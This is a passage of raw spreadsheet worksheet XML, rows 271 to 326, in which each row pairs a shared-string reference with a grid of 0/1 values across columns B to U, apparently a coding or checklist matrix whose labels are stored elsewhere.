        <v>0</v>
      </c>
      <c r="E271" s="9">
        <v>1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1</v>
      </c>
      <c r="M271" s="1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7">
        <v>0</v>
      </c>
      <c r="U271" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="272" spans="1:21" ht="24">
      <c r="A272" s="7" t="s">
        <v>275</v>
      </c>
      <c r="B272" s="1">
        <v>1</v>
      </c>
      <c r="C272" s="12">
        <v>0</v>
      </c>
      <c r="D272" s="9">
        <v>0</v>
      </c>
      <c r="E272" s="9">
        <v>0</v>
      </c>
      <c r="F272" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U272" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="273" spans="1:21">
      <c r="A273" s="7" t="s">
        <v>276</v>
      </c>
      <c r="B273" s="1">
        <v>0</v>
      </c>
      <c r="C273" s="12">
        <v>0</v>
      </c>
      <c r="D273" s="9">
        <v>0</v>
      </c>
      <c r="E273" s="9">
        <v>0</v>
      </c>
      <c r="F273" s="9">
        <v>1</v>
      </c>
      <c r="G273" s="9">
        <v>0</v>
      </c>
      <c r="H273" s="9">
        <v>0</v>
      </c>
      <c r="I273" s="9">
        <v>0</v>
      </c>
      <c r="J273" s="9">
        <v>0</v>
      </c>
      <c r="K273" s="9">
        <v>1</v>
      </c>
      <c r="L273" s="9">
        <v>0</v>
      </c>
      <c r="M273" s="1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7">
        <v>0</v>
      </c>
      <c r="U273" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="274" spans="1:21" ht="36">
      <c r="A274" s="7" t="s">
        <v>277</v>
      </c>
      <c r="B274" s="1">
        <v>0</v>
      </c>
      <c r="C274" s="12">
        <v>0</v>
      </c>
      <c r="D274" s="9">
        <v>0</v>
      </c>
      <c r="E274" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U274" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="275" spans="1:21">
      <c r="A275" s="7" t="s">
        <v>278</v>
      </c>
      <c r="B275" s="1">
        <v>0</v>
      </c>
      <c r="C275" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U275" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="276" spans="1:21" ht="36">
      <c r="A276" s="7" t="s">
        <v>279</v>
      </c>
      <c r="B276" s="1">
        <v>1</v>
      </c>
      <c r="C276" s="12">
        <v>1</v>
      </c>
      <c r="D276" s="9">
        <v>0</v>
      </c>
      <c r="E276" s="9">
        <v>1</v>
      </c>
      <c r="F276" s="9">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N276" s="12">
        <v>0</v>
      </c>
      <c r="O276" s="12">
        <v>0</v>
      </c>
      <c r="P276" s="12">
        <v>0</v>
      </c>
      <c r="Q276" s="12">
        <v>1</v>
      </c>
      <c r="R276" s="12">
        <v>0</v>
      </c>
      <c r="S276" s="12">
        <v>0</v>
      </c>
      <c r="T276" s="17">
        <v>0</v>
      </c>
      <c r="U276" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="277" spans="1:21">
      <c r="A277" s="7" t="s">
        <v>280</v>
      </c>
      <c r="B277" s="1">
        <v>1</v>
      </c>
      <c r="C277" s="12">
        <v>0</v>
      </c>
      <c r="D277" s="9">
        <v>0</v>
      </c>
      <c r="E277" s="9">
        <v>1</v>
      </c>
      <c r="F277" s="9">
        <v>0</v>
      </c>
      <c r="G277" s="9">
        <v>0</v>
      </c>
      <c r="H277" s="9">
        <v>1</v>
      </c>
      <c r="I277" s="9">
        <v>0</v>
      </c>
      <c r="J277" s="9">
        <v>0</v>
      </c>
      <c r="K277" s="9">
        <v>0</v>
      </c>
      <c r="L277" s="9">
        <v>0</v>
      </c>
      <c r="M277" s="1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7">
        <v>0</v>
      </c>
      <c r="U277" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="278" spans="1:21" ht="36">
      <c r="A278" s="7" t="s">
        <v>281</v>
      </c>
      <c r="B278" s="1">
        <v>1</v>
      </c>
      <c r="C278" s="12">
        <v>1</v>
      </c>
      <c r="D278" s="9">
        <v>0</v>
      </c>
      <c r="E278" s="9">
        <v>1</v>
      </c>
      <c r="F278" s="9">
        <v>0</v>
      </c>
      <c r="G278" s="9">
        <v>0</v>
      </c>
      <c r="H278" s="9">
        <v>1</v>
      </c>
      <c r="I278" s="9">
        <v>0</v>
      </c>
      <c r="J278" s="9">
        <v>0</v>
      </c>
      <c r="K278" s="9">
        <v>0</v>
      </c>
      <c r="L278" s="9">
        <v>0</v>
      </c>
      <c r="M278" s="1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1</v>
      </c>
      <c r="S278" s="12">
        <v>0</v>
      </c>
      <c r="T278" s="17">
        <v>0</v>
      </c>
      <c r="U278" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="279" spans="1:21">
      <c r="A279" s="7" t="s">
        <v>282</v>
      </c>
      <c r="B279" s="1">
        <v>1</v>
      </c>
      <c r="C279" s="12">
        <v>0</v>
      </c>
      <c r="D279" s="9">
        <v>0</v>
      </c>
      <c r="E279" s="9">
        <v>0</v>
      </c>
      <c r="F279" s="9">
        <v>1</v>
      </c>
      <c r="G279" s="9">
        <v>0</v>
      </c>
      <c r="H279" s="9">
        <v>1</v>
      </c>
      <c r="I279" s="9">
        <v>0</v>
      </c>
      <c r="J279" s="9">
        <v>0</v>
      </c>
      <c r="K279" s="9">
        <v>0</v>
      </c>
      <c r="L279" s="9">
        <v>0</v>
      </c>
      <c r="M279" s="1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7">
        <v>0</v>
      </c>
      <c r="U279" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="280" spans="1:21">
      <c r="A280" s="7" t="s">
        <v>283</v>
      </c>
      <c r="B280" s="1">
        <v>1</v>
      </c>
      <c r="C280" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U280" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="281" spans="1:21">
      <c r="A281" s="7" t="s">
        <v>284</v>
      </c>
      <c r="B281" s="1">
        <v>1</v>
      </c>
      <c r="C281" s="12">
        <v>0</v>
      </c>
      <c r="D281" s="9">
        <v>0</v>
      </c>
      <c r="E281" s="9">
        <v>1</v>
      </c>
      <c r="F281" s="9">
        <v>1</v>
      </c>
      <c r="G281" s="9">
        <v>0</v>
      </c>
      <c r="H281" s="9">
        <v>1</v>
      </c>
      <c r="I281" s="9">
        <v>0</v>
      </c>
      <c r="J281" s="9">
        <v>0</v>
      </c>
      <c r="K281" s="9">
        <v>0</v>
      </c>
      <c r="L281" s="9">
        <v>0</v>
      </c>
      <c r="M281" s="1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7">
        <v>0</v>
      </c>
      <c r="U281" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="282" spans="1:21">
      <c r="A282" s="7" t="s">
        <v>285</v>
      </c>
      <c r="B282" s="1">
        <v>0</v>
      </c>
      <c r="C282" s="12">
        <v>0</v>
      </c>
      <c r="D282" s="9">
        <v>0</v>
      </c>
      <c r="E282" s="9">
        <v>0</v>
      </c>
      <c r="F282" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U282" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="283" spans="1:21">
      <c r="A283" s="7" t="s">
        <v>286</v>
      </c>
      <c r="B283" s="1">
        <v>0</v>
      </c>
      <c r="C283" s="12">
        <v>0</v>
      </c>
      <c r="D283" s="9">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U283" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="284" spans="1:21">
      <c r="A284" s="7" t="s">
        <v>287</v>
      </c>
      <c r="B284" s="1">
        <v>1</v>
      </c>
      <c r="C284" s="12">
        <v>0</v>
      </c>
      <c r="D284" s="9">
        <v>0</v>
      </c>
      <c r="E284" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U284" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="285" spans="1:21" ht="24">
      <c r="A285" s="7" t="s">
        <v>288</v>
      </c>
      <c r="B285" s="1">
        <v>1</v>
      </c>
      <c r="C285" s="12">
        <v>0</v>
      </c>
      <c r="D285" s="9">
        <v>0</v>
      </c>
      <c r="E285" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U285" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="286" spans="1:21">
      <c r="A286" s="7" t="s">
        <v>289</v>
      </c>
      <c r="B286" s="1">
        <v>0</v>
      </c>
      <c r="C286" s="12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1</v>
      </c>
      <c r="M286" s="1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7">
        <v>0</v>
      </c>
      <c r="U286" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="287" spans="1:21">
      <c r="A287" s="7" t="s">
        <v>290</v>
      </c>
      <c r="B287" s="1">
        <v>1</v>
      </c>
      <c r="C287" s="12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0</v>
      </c>
      <c r="J287" s="9">
        <v>0</v>
      </c>
      <c r="K287" s="9">
        <v>0</v>
      </c>
      <c r="L287" s="9">
        <v>0</v>
      </c>
      <c r="M287" s="1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7">
        <v>0</v>
      </c>
      <c r="U287" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="288" spans="1:21">
      <c r="A288" s="7" t="s">
        <v>291</v>
      </c>
      <c r="B288" s="1">
        <v>0</v>
      </c>
      <c r="C288" s="12">
        <v>0</v>
      </c>
      <c r="D288" s="9">
        <v>0</v>
      </c>
      <c r="E288" s="9">
        <v>0</v>
      </c>
      <c r="F288" s="9">
        <v>1</v>
      </c>
      <c r="G288" s="9">
        <v>0</v>
      </c>
      <c r="H288" s="9">
        <v>0</v>
      </c>
      <c r="I288" s="9">
        <v>0</v>
      </c>
      <c r="J288" s="9">
        <v>0</v>
      </c>
      <c r="K288" s="9">
        <v>1</v>
      </c>
      <c r="L288" s="9">
        <v>0</v>
      </c>
      <c r="M288" s="1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7">
        <v>0</v>
      </c>
      <c r="U288" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="289" spans="1:21">
      <c r="A289" s="7" t="s">
        <v>292</v>
      </c>
      <c r="B289" s="1">
        <v>0</v>
      </c>
      <c r="C289" s="12">
        <v>0</v>
      </c>
      <c r="D289" s="9">
        <v>0</v>
      </c>
      <c r="E289" s="9">
        <v>1</v>
      </c>
      <c r="F289" s="9">
        <v>1</v>
      </c>
      <c r="G289" s="9">
        <v>0</v>
      </c>
      <c r="H289" s="9">
        <v>0</v>
      </c>
      <c r="I289" s="9">
        <v>0</v>
      </c>
      <c r="J289" s="9">
        <v>0</v>
      </c>
      <c r="K289" s="9">
        <v>1</v>
      </c>
      <c r="L289" s="9">
        <v>0</v>
      </c>
      <c r="M289" s="1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7">
        <v>0</v>
      </c>
      <c r="U289" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="290" spans="1:21">
      <c r="A290" s="7" t="s">
        <v>293</v>
      </c>
      <c r="B290" s="1">
        <v>1</v>
      </c>
      <c r="C290" s="12">
        <v>1</v>
      </c>
      <c r="D290" s="9">
        <v>0</v>
      </c>
      <c r="E290" s="9">
        <v>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1">
        <v>0</v>
      </c>
      <c r="N290" s="12">
        <v>0</v>
      </c>
      <c r="O290" s="12">
        <v>0</v>
      </c>
      <c r="P290" s="12">
        <v>1</v>
      </c>
      <c r="Q290" s="12">
        <v>0</v>
      </c>
      <c r="R290" s="12">
        <v>0</v>
      </c>
      <c r="S290" s="12">
        <v>0</v>
      </c>
      <c r="T290" s="17">
        <v>0</v>
      </c>
      <c r="U290" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="291" spans="1:21">
      <c r="A291" s="7" t="s">
        <v>294</v>
      </c>
      <c r="B291" s="1">
        <v>0</v>
      </c>
      <c r="C291" s="12">
        <v>0</v>
      </c>
      <c r="D291" s="9">
        <v>0</v>
      </c>
      <c r="E291" s="9">
        <v>1</v>
      </c>
      <c r="F291" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U291" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="292" spans="1:21" ht="24">
      <c r="A292" s="7" t="s">
        <v>295</v>
      </c>
      <c r="B292" s="1">
        <v>1</v>
      </c>
      <c r="C292" s="12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1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7">
        <v>1</v>
      </c>
      <c r="U292" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="293" spans="1:21" ht="24">
      <c r="A293" s="7" t="s">
        <v>296</v>
      </c>
      <c r="B293" s="1">
        <v>1</v>
      </c>
      <c r="C293" s="12">
        <v>0</v>
      </c>
      <c r="D293" s="9">
        <v>0</v>
      </c>
      <c r="E293" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U293" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="294" spans="1:21">
      <c r="A294" s="7" t="s">
        <v>297</v>
      </c>
      <c r="B294" s="1">
        <v>1</v>
      </c>
      <c r="C294" s="12">
        <v>0</v>
      </c>
      <c r="D294" s="9">
        <v>0</v>
      </c>
      <c r="E294" s="9">
        <v>0</v>
      </c>
      <c r="F294" s="9">
        <v>1</v>
      </c>
      <c r="G294" s="9">
        <v>0</v>
      </c>
      <c r="H294" s="9">
        <v>1</v>
      </c>
      <c r="I294" s="9">
        <v>0</v>
      </c>
      <c r="J294" s="9">
        <v>0</v>
      </c>
      <c r="K294" s="9">
        <v>0</v>
      </c>
      <c r="L294" s="9">
        <v>0</v>
      </c>
      <c r="M294" s="1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7">
        <v>0</v>
      </c>
      <c r="U294" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="295" spans="1:21" ht="24">
      <c r="A295" s="7" t="s">
        <v>298</v>
      </c>
      <c r="B295" s="1">
        <v>0</v>
      </c>
      <c r="C295" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U295" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="296" spans="1:21" ht="24">
      <c r="A296" s="7" t="s">
        <v>299</v>
      </c>
      <c r="B296" s="1">
        <v>1</v>
      </c>
      <c r="C296" s="12">
        <v>0</v>
      </c>
      <c r="D296" s="9">
        <v>0</v>
      </c>
      <c r="E296" s="9">
        <v>0</v>
      </c>
      <c r="F296" s="9">
        <v>0</v>
      </c>
      <c r="G296" s="9">
        <v>0</v>
      </c>
      <c r="H296" s="9">
        <v>1</v>
      </c>
      <c r="I296" s="9">
        <v>0</v>
      </c>
      <c r="J296" s="9">
        <v>0</v>
      </c>
      <c r="K296" s="9">
        <v>1</v>
      </c>
      <c r="L296" s="9">
        <v>0</v>
      </c>
      <c r="M296" s="1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7">
        <v>0</v>
      </c>
      <c r="U296" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="297" spans="1:21" ht="24">
      <c r="A297" s="7" t="s">
        <v>300</v>
      </c>
      <c r="B297" s="1">
        <v>1</v>
      </c>
      <c r="C297" s="12">
        <v>0</v>
      </c>
      <c r="D297" s="9">
        <v>0</v>
      </c>
      <c r="E297" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U297" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="298" spans="1:21" ht="72">
      <c r="A298" s="7" t="s">
        <v>301</v>
      </c>
      <c r="B298" s="1">
        <v>0</v>
      </c>
      <c r="C298" s="12">
        <v>0</v>
      </c>
      <c r="D298" s="9">
        <v>0</v>
      </c>
      <c r="E298" s="9">
        <v>1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1</v>
      </c>
      <c r="M298" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U298" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="299" spans="1:21">
      <c r="A299" s="7" t="s">
        <v>302</v>
      </c>
      <c r="B299" s="1">
        <v>0</v>
      </c>
      <c r="C299" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U299" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="300" spans="1:21">
      <c r="A300" s="7" t="s">
        <v>303</v>
      </c>
      <c r="B300" s="1">
        <v>1</v>
      </c>
      <c r="C300" s="12">
        <v>1</v>
      </c>
      <c r="D300" s="9">
        <v>0</v>
      </c>
      <c r="E300" s="9">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N300" s="12">
        <v>0</v>
      </c>
      <c r="O300" s="12">
        <v>1</v>
      </c>
      <c r="P300" s="12">
        <v>0</v>
      </c>
      <c r="Q300" s="12">
        <v>0</v>
      </c>
      <c r="R300" s="12">
        <v>0</v>
      </c>
      <c r="S300" s="12">
        <v>0</v>
      </c>
      <c r="T300" s="17">
        <v>0</v>
      </c>
      <c r="U300" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="301" spans="1:21" ht="24">
      <c r="A301" s="7" t="s">
        <v>304</v>
      </c>
      <c r="B301" s="1">
        <v>1</v>
      </c>
      <c r="C301" s="12">
        <v>0</v>
      </c>
      <c r="D301" s="9">
        <v>0</v>
      </c>
      <c r="E301" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U301" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="302" spans="1:21" ht="24">
      <c r="A302" s="7" t="s">
        <v>305</v>
      </c>
      <c r="B302" s="1">
        <v>1</v>
      </c>
      <c r="C302" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U302" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="303" spans="1:21">
      <c r="A303" s="7" t="s">
        <v>306</v>
      </c>
      <c r="B303" s="1">
        <v>1</v>
      </c>
      <c r="C303" s="12">
        <v>0</v>
      </c>
      <c r="D303" s="9">
        <v>0</v>
      </c>
      <c r="E303" s="9">
        <v>0</v>
      </c>
      <c r="F303" s="9">
        <v>0</v>
      </c>
      <c r="G303" s="9">
        <v>0</v>
      </c>
      <c r="H303" s="9">
        <v>1</v>
      </c>
      <c r="I303" s="9">
        <v>0</v>
      </c>
      <c r="J303" s="9">
        <v>0</v>
      </c>
      <c r="K303" s="9">
        <v>0</v>
      </c>
      <c r="L303" s="9">
        <v>0</v>
      </c>
      <c r="M303" s="1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7">
        <v>0</v>
      </c>
      <c r="U303" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="304" spans="1:21" ht="24">
      <c r="A304" s="7" t="s">
        <v>307</v>
      </c>
      <c r="B304" s="1">
        <v>1</v>
      </c>
      <c r="C304" s="12">
        <v>0</v>
      </c>
      <c r="D304" s="9">
        <v>0</v>
      </c>
      <c r="E304" s="9">
        <v>0</v>
      </c>
      <c r="F304" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U304" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="305" spans="1:21" ht="24">
      <c r="A305" s="7" t="s">
        <v>308</v>
      </c>
      <c r="B305" s="1">
        <v>0</v>
      </c>
      <c r="C305" s="12">
        <v>0</v>
      </c>
      <c r="D305" s="9">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U305" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="306" spans="1:21" ht="84">
      <c r="A306" s="7" t="s">
        <v>309</v>
      </c>
      <c r="B306" s="1">
        <v>0</v>
      </c>
      <c r="C306" s="12">
        <v>1</v>
      </c>
      <c r="D306" s="9">
        <v>0</v>
      </c>
      <c r="E306" s="9">
        <v>1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1</v>
      </c>
      <c r="M306" s="1">
        <v>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7">
        <v>0</v>
      </c>
      <c r="U306" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="307" spans="1:21" ht="36">
      <c r="A307" s="7" t="s">
        <v>310</v>
      </c>
      <c r="B307" s="1">
        <v>1</v>
      </c>
      <c r="C307" s="12">
        <v>1</v>
      </c>
      <c r="D307" s="9">
        <v>0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9">
        <v>0</v>
      </c>
      <c r="L307" s="9">
        <v>0</v>
      </c>
      <c r="M307" s="1">
        <v>0</v>
      </c>
      <c r="N307" s="12">
        <v>0</v>
      </c>
      <c r="O307" s="12">
        <v>0</v>
      </c>
      <c r="P307" s="12">
        <v>0</v>
      </c>
      <c r="Q307" s="12">
        <v>1</v>
      </c>
      <c r="R307" s="12">
        <v>0</v>
      </c>
      <c r="S307" s="12">
        <v>0</v>
      </c>
      <c r="T307" s="17">
        <v>0</v>
      </c>
      <c r="U307" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="308" spans="1:21" ht="48">
      <c r="A308" s="7" t="s">
        <v>311</v>
      </c>
      <c r="B308" s="1">
        <v>1</v>
      </c>
      <c r="C308" s="12">
        <v>1</v>
      </c>
      <c r="D308" s="9">
        <v>0</v>
      </c>
      <c r="E308" s="9">
        <v>0</v>
      </c>
      <c r="F308" s="9">
        <v>0</v>
      </c>
      <c r="G308" s="9">
        <v>0</v>
      </c>
      <c r="H308" s="9">
        <v>1</v>
      </c>
      <c r="I308" s="9">
        <v>0</v>
      </c>
      <c r="J308" s="9">
        <v>0</v>
      </c>
      <c r="K308" s="9">
        <v>0</v>
      </c>
      <c r="L308" s="9">
        <v>0</v>
      </c>
      <c r="M308" s="1">
        <v>0</v>
      </c>
      <c r="N308" s="12">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U308" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="309" spans="1:21" ht="24">
      <c r="A309" s="7" t="s">
        <v>312</v>
      </c>
      <c r="B309" s="1">
        <v>1</v>
      </c>
      <c r="C309" s="12">
        <v>1</v>
      </c>
      <c r="D309" s="9">
        <v>0</v>
      </c>
      <c r="E309" s="9">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N309" s="12">
        <v>0</v>
      </c>
      <c r="O309" s="12">
        <v>0</v>
      </c>
      <c r="P309" s="12">
        <v>1</v>
      </c>
      <c r="Q309" s="12">
        <v>0</v>
      </c>
      <c r="R309" s="12">
        <v>0</v>
      </c>
      <c r="S309" s="12">
        <v>0</v>
      </c>
      <c r="T309" s="17">
        <v>0</v>
      </c>
      <c r="U309" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="310" spans="1:21" ht="24">
      <c r="A310" s="7" t="s">
        <v>313</v>
      </c>
      <c r="B310" s="1">
        <v>1</v>
      </c>
      <c r="C310" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U310" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="311" spans="1:21" ht="24">
      <c r="A311" s="7" t="s">
        <v>314</v>
      </c>
      <c r="B311" s="1">
        <v>1</v>
      </c>
      <c r="C311" s="12">
        <v>1</v>
      </c>
      <c r="D311" s="9">
        <v>0</v>
      </c>
      <c r="E311" s="9">
        <v>1</v>
      </c>
      <c r="F311" s="9">
        <v>0</v>
      </c>
      <c r="G311" s="9">
        <v>0</v>
      </c>
      <c r="H311" s="9">
        <v>1</v>
      </c>
      <c r="I311" s="9">
        <v>0</v>
      </c>
      <c r="J311" s="9">
        <v>0</v>
      </c>
      <c r="K311" s="9">
        <v>0</v>
      </c>
      <c r="L311" s="9">
        <v>0</v>
      </c>
      <c r="M311" s="1">
        <v>0</v>
      </c>
      <c r="N311" s="12">
        <v>0</v>
      </c>
      <c r="O311" s="12">
        <v>0</v>
      </c>
      <c r="P311" s="12">
        <v>0</v>
      </c>
      <c r="Q311" s="12">
        <v>1</v>
      </c>
      <c r="R311" s="12">
        <v>0</v>
      </c>
      <c r="S311" s="12">
        <v>0</v>
      </c>
      <c r="T311" s="17">
        <v>0</v>
      </c>
      <c r="U311" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="312" spans="1:21" ht="24">
      <c r="A312" s="7" t="s">
        <v>315</v>
      </c>
      <c r="B312" s="1">
        <v>1</v>
      </c>
      <c r="C312" s="12">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U312" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="313" spans="1:21" ht="24">
      <c r="A313" s="7" t="s">
        <v>316</v>
      </c>
      <c r="B313" s="1">
        <v>0</v>
      </c>
      <c r="C313" s="12">
        <v>0</v>
      </c>
      <c r="D313" s="9">
        <v>0</v>
      </c>
      <c r="E313" s="9">
        <v>1</v>
      </c>
      <c r="F313" s="9">
        <v>1</v>
      </c>
      <c r="G313" s="9">
        <v>0</v>
      </c>
      <c r="H313" s="9">
        <v>0</v>
      </c>
      <c r="I313" s="9">
        <v>0</v>
      </c>
      <c r="J313" s="9">
        <v>0</v>
      </c>
      <c r="K313" s="9">
        <v>1</v>
      </c>
      <c r="L313" s="9">
        <v>0</v>
      </c>
      <c r="M313" s="1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7">
        <v>0</v>
      </c>
      <c r="U313" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="314" spans="1:21" ht="24">
      <c r="A314" s="7" t="s">
        <v>317</v>
      </c>
      <c r="B314" s="1">
        <v>1</v>
      </c>
      <c r="C314" s="12">
        <v>0</v>
      </c>
      <c r="D314" s="9">
        <v>0</v>
      </c>
      <c r="E314" s="9">
        <v>0</v>
      </c>
      <c r="F314" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U314" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="315" spans="1:21" ht="24">
      <c r="A315" s="7" t="s">
        <v>318</v>
      </c>
      <c r="B315" s="1">
        <v>0</v>
      </c>
      <c r="C315" s="12">
        <v>0</v>
      </c>
      <c r="D315" s="9">
        <v>0</v>
      </c>
      <c r="E315" s="9">
        <v>1</v>
      </c>
      <c r="F315" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U315" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="316" spans="1:21">
      <c r="A316" s="7" t="s">
        <v>319</v>
      </c>
      <c r="B316" s="1">
        <v>0</v>
      </c>
      <c r="C316" s="12">
        <v>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1</v>
      </c>
      <c r="M316" s="1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7">
        <v>0</v>
      </c>
      <c r="U316" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="317" spans="1:21">
      <c r="A317" s="7" t="s">
        <v>320</v>
      </c>
      <c r="B317" s="1">
        <v>0</v>
      </c>
      <c r="C317" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U317" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="318" spans="1:21">
      <c r="A318" s="7" t="s">
        <v>321</v>
      </c>
      <c r="B318" s="1">
        <v>1</v>
      </c>
      <c r="C318" s="12">
        <v>0</v>
      </c>
      <c r="D318" s="9">
        <v>0</v>
      </c>
      <c r="E318" s="9">
        <v>0</v>
      </c>
      <c r="F318" s="9">
        <v>0</v>
      </c>
      <c r="G318" s="9">
        <v>0</v>
      </c>
      <c r="H318" s="9">
        <v>1</v>
      </c>
      <c r="I318" s="9">
        <v>0</v>
      </c>
      <c r="J318" s="9">
        <v>0</v>
      </c>
      <c r="K318" s="9">
        <v>0</v>
      </c>
      <c r="L318" s="9">
        <v>0</v>
      </c>
      <c r="M318" s="1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7">
        <v>0</v>
      </c>
      <c r="U318" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="319" spans="1:21" ht="24">
      <c r="A319" s="7" t="s">
        <v>322</v>
      </c>
      <c r="B319" s="1">
        <v>1</v>
      </c>
      <c r="C319" s="12">
        <v>0</v>
      </c>
      <c r="D319" s="9">
        <v>0</v>
      </c>
      <c r="E319" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U319" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="320" spans="1:21">
      <c r="A320" s="7" t="s">
        <v>323</v>
      </c>
      <c r="B320" s="1">
        <v>1</v>
      </c>
      <c r="C320" s="12">
        <v>0</v>
      </c>
      <c r="D320" s="9">
        <v>0</v>
      </c>
      <c r="E320" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U320" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="321" spans="1:21">
      <c r="A321" s="7" t="s">
        <v>324</v>
      </c>
      <c r="B321" s="1">
        <v>0</v>
      </c>
      <c r="C321" s="12">
        <v>0</v>
      </c>
      <c r="D321" s="9">
        <v>0</v>
      </c>
      <c r="E321" s="9">
        <v>1</v>
      </c>
      <c r="F321" s="9">
        <v>1</v>
      </c>
      <c r="G321" s="9">
        <v>0</v>
      </c>
      <c r="H321" s="9">
        <v>0</v>
      </c>
      <c r="I321" s="9">
        <v>0</v>
      </c>
      <c r="J321" s="9">
        <v>0</v>
      </c>
      <c r="K321" s="9">
        <v>1</v>
      </c>
      <c r="L321" s="9">
        <v>0</v>
      </c>
      <c r="M321" s="1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7">
        <v>0</v>
      </c>
      <c r="U321" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="322" spans="1:21" ht="60">
      <c r="A322" s="7" t="s">
        <v>325</v>
      </c>
      <c r="B322" s="1">
        <v>0</v>
      </c>
      <c r="C322" s="12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1</v>
      </c>
      <c r="M322" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U322" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="323" spans="1:21">
      <c r="A323" s="7" t="s">
        <v>326</v>
      </c>
      <c r="B323" s="1">
        <v>1</v>
      </c>
      <c r="C323" s="12">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N323" s="12">
        <v>0</v>
      </c>
      <c r="O323" s="12">
        <v>0</v>
      </c>
      <c r="P323" s="12">
        <v>1</v>
      </c>
      <c r="Q323" s="12">
        <v>0</v>
      </c>
      <c r="R323" s="12">
        <v>0</v>
      </c>
      <c r="S323" s="12">
        <v>0</v>
      </c>
      <c r="T323" s="17">
        <v>0</v>
      </c>
      <c r="U323" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="324" spans="1:21" ht="24">
      <c r="A324" s="7" t="s">
        <v>327</v>
      </c>
      <c r="B324" s="1">
        <v>1</v>
      </c>
      <c r="C324" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U324" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="325" spans="1:21" ht="24">
      <c r="A325" s="7" t="s">
        <v>328</v>
      </c>
      <c r="B325" s="1">
        <v>1</v>
      </c>
      <c r="C325" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U325" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="326" spans="1:21">
      <c r="A326" s="7" t="s">
        <v>329</v>
      </c>
      <c r="B326" s="1">
        <v>0</v>
      </c>
      <c r="C326" s="12">
        <v>0</v>
      </c>
      <c r="D326" s="9">
        <v>0</v>
      </c>
      <c r="E326" s="9">
        <v>0</v>
      </c>
      <c r="F326" s="9">
        <v>1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1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7">
